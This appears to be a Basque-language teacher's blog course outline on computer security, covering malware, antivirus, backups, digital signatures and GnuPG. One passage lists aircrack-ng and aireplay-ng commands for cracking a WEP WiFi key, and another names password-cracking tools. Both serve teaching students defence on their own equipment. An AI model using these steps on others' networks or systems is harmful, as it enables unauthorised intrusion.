Informazioa bilatzeko zenbait termino eta helbide:

• LSSI (http://www.lssi.es)
• LOPD (http://www.agpd.es)
• SGAE
• Canon Digital
• http://www.kriptopolis.org/cae-alasbarricadas
• http://bufetalmeida.com/
• LSSI edo lege batek izan ditzakeen interpretazio desberdinak
• LSSI legea, sarea zentsuratzeko
• http://bandaancha.eu/articulos/legislacion
• DRM: Eskubide digitalen kudeaketa
• CC: creative commons
• …

03UD eta 04UD

Sartuko dena:

1) Software maltzurra. Kontzeptuak:

• Abio sektorekoak, Lehergailu logikoak, …
• Birusak: Troyar Zaldiak,  Harrak,  Makro birusak, rootkit…
• Spyware, Adware
• Windows / Linux sistema eragileetan birusek duten eragina

2) Software maltzurretik babesteko eta desinfektatzeko tresnak:

• Antibirusak
• Infektaturik dagoen ordenagailu bat garbitzeko pausoak.
• Ordenagailu sare bat garbitzeko pausoak.
• Antibirusen erabilpena.

3) Sare ari-dunen eta ari-gabeen monitorizazioa:

• Sare ari-dunen monitorizazioa. Wireshark.
• Zer neurri hartuko zenituzke monitorizazioa ekiditeko?
• Sare ari-gabeetan (WIFI)  gakoaren segurtasuna.
• Zer neurri hartuko zenituzke zure WIFI sarea babesteko?

4) Sinadura digitala eta zihurtagiri digitala:

• ONA, DNIe
• Erabilpena

Azterketarako OHARRAK:

• Erabilpenaren ikuspuntutik ikasi.

• Kontzeptuak azaltzeko adibideak erabili.

1. Sare zerbitzuak kontrolatu eta inbentarioa egiteko beharrak identifikatzea.
2. Ingeniaritza sozialaren teknikak egiaztatu informatika iruzurra eta informazioaren lapurretan.
3. Publizitate eta spam postak sortzen duen trafiko bolumena minimizatzeko garrantziaz jabetzea.
4. Sare hari-dunen monitorizazioa ekiditeko neurriak aplikatzea.
5. Sare hari-gabeetan erabiltzen diren protokoloen segurtasun propietateak baloratzea eta sailkatzea.
6. Sinadura digitala, ziurtagiri digitala, … bezalako identifikazio sistemak azaldu.
7. Sinadura digitala, ziurtagiri digitala, … bezalako identifikazio sistemak erabiltzea.
8. Suebaki bat instalatzea zerbitzaria den ekipo batean.

Iharduerak:

[OHARRA: Jarduera guzti hauen helburua Sare batean egon daitezkeen segurtasun arazoez jabetzea da. Gero hauek ekiditeko hartu beharreko neurriak aplikatzeko. Probak zuen routerraren gainean egin itzazue ]

• Sare hari-dunen monitorizazioa egitea wireshark erabilita. Ariketa honetan sareko trafikoa aztertuko dugu eta ondorio batetara iritsiko gara, saretik dena ikus daiteke, beraz, nola babes gaitezken aztertuko dugu.
• Sare hari-gabeen monitorizazioa:
  • wifislax, BackTrack, aircrack-ng, EthicalHacker, insecure.org, ..
  • http://www.youtube.com/watch?v=jETwvEDaJeQ
  • http://www.youtube.com/watch?v=GxvO8W0jqiU
  • Nola jakin WEB gako egokia dugun.Adibidea: http://www.gabehabe.com/blog/how-to-crack-wep/
    • Pausoak:
      # iwconfig  (wlan gailuak zerrendatzeko)
      # airmon-ng start wlan0  (wlan0 monitore moduan jartzeko -> mon0 sortzen du)
      # airodump-ng mon0  (ingurua eskaneatzen du. AP-en BSSID eta kanalak jakiteko)
      # airodum-ng -c kanala –bssid  APrenBssida -w fitxategia mon0  (Dagokion APtik DAtuak entzuten ditu)
      (
      Datuak txertatzeko:
      # aireplay-ng -1 0 -a (bssid) -h GureHardwareHelbidea (interface)
# aireplay-ng -3 -b (bssid) -h GureHardwareHelbidea (interface)
)
      # aircrack-ng fitxategia.cap  (datuetatik gakoa ateratzeko)
    • Aurrerago aipatu bezala, guzti honen helburua Gako tamaina handiak erabili behar direla ohartaraztea da.
  • Babesteko neurriak:
    • Egindako ariketetatik ondorio bezala, zein neurri hartu behar dira sarea babesteko?
• Aktibitatea: Informatika iruzurra eta informazioaren lapurreten inguruko informazioa
  • Lan bat egin beharko duzue Ingenieritza soziala, spam, … informatikan eman daitezkeen iruzurren inguruan eta iruzur horiek saihesteko hartu beharreko neurrien inguruan. Lanak intranetean utzi behar dituzue.
• Suebakia
• Ziurtagiri digitala. Sinadura digitala. ONA, DNIe, …
  • DNIe:
    • http://www.dnie.es/
    • http://www.dnie.es/descargas/PKCS11_para_Sistemas_Unix/    (Ubuntu-n erabiltzeko)
    • http://www.axlinux.es/2008/10/configuracion-del-dnie-en-firefox3-en.html (tutorial bat)
    • http://www.ubuntu-es.org/?q=node/93778

Helburuak
1. Kontingentzia planekin jarraitzea segurtasun hutsuneen aurrean.
2. Software maltzur ezberdinak sailkatzea.
3. Sistemaren eguneraketak maiz egitea sistemaren urraketa posibleak zuzentzeko.
4. Sisteman instalatzen diren aplikazioen jatorria eta kautotasuna egiaztatzea.
5. Software maltzurra atzeman eta kentzeko aplikazioak instalatu, probatu eta eguneratzea.
6. Datuak berreskuratzeko teknikak aplikatzea.

AKTIBITATEAK

1. Aktibitatea: Kontingentzia plan bat zer den eta nola diseinatzen den azaltzea.

2. Aktibitatea: Software maltzurra atzemateko dauden tresna motak azaltzea.

Software maltzurra kontzeptuak.

Ariketa: Ikasle bakoitzak birus pare bat aztertu eta bere ezaugarri nagusiak azaldu behar ditu gelan egingo duen aurkezpen baten bidez. Aurkezpena abenduak 18 Ostirala.

http://web.alerta-antivirus.es/
http://www.enciclopediavirus.com/

3. Aktibitatea: Software maltzurra atzeman eta desinfektatzea:

a) Windows batean antibirus ezberdinak probatu behar dituzue: (AVG, Avast, nod32, …). Oharra, normalean bi antibirus batera instalatzeak arazoak ematen ditu. Beraz, bigarrego antibirusa probatu aurretik bestea kendu. Aukera aurreratua: Linux batetik Windows bateko birusak kentzea (clamav, clamtk, (freshclam, clamscan))

b) Taldeka jarri eta talde bakoitzak windows bat prestatu behar du biruses betea. Beste taldeak garbiketa lanak egin beharko ditu.

c) Ondorio bezala, ikasle bakoitzan sistema bat garbitzeko protokolo (pauso) egokiak zein diren azaltzen duen lan bat egin beharko du.

Sartuko dena:

1) Segurtasun Fisikoa

2) UPS-SAI gailuak

3) Sistemara sartzeko kontrola

4) Sistemara sartzeko pasahitz, pasa-esaldi egokia aukeratzea

5) Sistemaren pasahitza egokia den aztertzea

6) Sistemara sartzeko gailu biometrikoak

7) Segurtasun kopien estrategia eta metodoak:Backup Oso, Inkremental eta diferentzialak

Segurtasun kopiak Linux eta Windowsen

9 ) Sistema osoaren Segurtasun kopia egitea: Clonezilla

10) Informazioa enkriptatzeko teknikak: Simetrikoa, asimetrikoa

11) Sinadura Digitala

1. Aktibitatea:02UD-01A:Existitzen diren biltegiratze baliabideen azalpena.

2. Aktibitatea:02UD-02A:Praktika. Biltegiratze baliabide baten inguruan lan bat egitea.

3. Aktibitatea: 02UD-03A:Segurtasun kopien estrategia eta metodoen azalpena.

Ariketa: Backup Oso, Inkremental eta diferentzialen arteko ezberdintasuna zein dira? jarri adibide bat.

4. Aktibitatea: 02UD-04A:Praktika. Segurtasun kopiak egitea estrategia ezberdinak erabiliz.

Praktikak bi sistema eragile erabiliz egingo dira. Windows eta Linux.

a) Direktorio baten segurtasun kopia egitea

b) Sistema osoaren kopia egitea

Tresnak:

Windowseko Backup egiteko tresnak: Defektuz dakarrena

Linuxerako tresnak: sbackup, pybackpack, dar / kdar, …

5. Aktibitatea: 02UD-05A:Praktika. Funtzionamenduan dagoen sistema batean babes kopiak sortu eta leheneratzea.

Sistema osoaren Segurtasun kopia egiteko:

Clonezilla, ghost, …

6. Aktibitatea: 02UD-06A:Existitzen diren kriptografia metodo ezberdinen azalpena egitea.

Teoria

7. Aktibitatea: 02UD-07A:Praktika. Informazioa enkriptatzeko ariketak egitea.

GnuPG

http://www.gnupg.org/gph/en/manual.html

GnuPG aginduaren laburpena:

Gako parea sortu:
$ gpg – -gen-key

Gakoak esportatu:
$ gpg – -export [UID]

UID: erabiltzaile identifikatzailea
- -armor aukera jarriz gero emaitza ASCII izango da.

Gakoak inportatu:
$ gpg – -import [fitxategia]

Gakoen zerrenda ikusi:
$ gpg – -list-keys

Gakoa ezabatu:
$ gpg – -delete-key UID

Gakoa sinatu:
$ gpg – -edit-key UID

Enkriptatzeko:

$ gpg – -encrypt [fitxategia]

$ gpg --output doc.gpg --encrypt --recipient blake@cyb.org doc
$ gpg --output doc --decrypt doc.gpg

Enkriptazio simetrikoa egiteko:
$ gpg – -symmetric [fitxategia]

Desenkriptatzeko:
$ gpg [- -decrypt] [fitxategia]

Sinatzeko:
$ gpg – -clearsign [fitxategia]

Sinadura egokia den jakiteko:
$ gpg [- -verify] [fitxategia.asc]

GnuPG FrontEnd Grafikoak:

Posta Elektronikoa eta enkriptazioa:

Thunderbird  eta Enigmail erabiliz posta elektronikoa modu seguruan  bidali eta jasotzeko ariketak egingo ditugu. Pausoak:

1) Thunderbird instalatu eta konfiguratu. Adibidez gmaileko kontu batekin. Horretarako POP eta SMTP zer diren jakin behar duzue.

2) Ondoren, Enigmail thunderbirden addons gehigarria instalatu eta konfiguratu.

]]> http://ms21.wordpress.com/2009/10/14/02ud-informazioaren-biltegiratze-sistemen-kudeaketa/feed/ 0 irakasleibiltaria thunderbird3 thunderbird4 http://ms21.wordpress.com/2009/09/18/01ud-segurtasun-pasiboko-neurriak-ezartzea/ http://ms21.wordpress.com/2009/09/18/01ud-segurtasun-pasiboko-neurriak-ezartzea/#comments Fri, 18 Sep 2009 12:07:06 +0000 irakasleibiltaria http://ms21.wordpress.com/?p=5 ]]> 01UD-01A:

• Segurtasun Fisikoa: Aurkezpena

01UD-02A:

• Ariketa: UPS-SAI gailuak aukeratu behar dituzue bi kasu hauetarako:

1. Etxerako
2. Ikastetxeko zuen gelarako

Lana taldeka edo bakarka egin daiteke. Aukera guztiak justifikatu behar dira. Lana amaitzean Posta bidez irakasleari bidali (zubirimanteobatx abildua gmail puntu com).

01UD-03A:

• Sistemara sartzeko kontrola: Aurkezpena

01UD-04A:

• Ariketa: Sistemara sartzeko pasahitz, pasa-esaldi egokia aukeratzea. Sistemaren pasahitza egokia den aztertzea.
• Loturak:
  • Ophcrack
  • john the ripper
  • bkhive / samdump2
  • kon-boot
  • Tutorialak:
    • Windowseko pasahitzaran indarra aztertu
    • …

  Lana entregatzeko epea: URRIAK 23

01UD-05A:

• Sistemara sartzeko gailu biometrikoen azterketa.

Lana Entregatzeko epea: URRIAK 23

Teoria ehu-ko segurtasuna ikasgaian erabili dituztez zenbait gardenki izango da.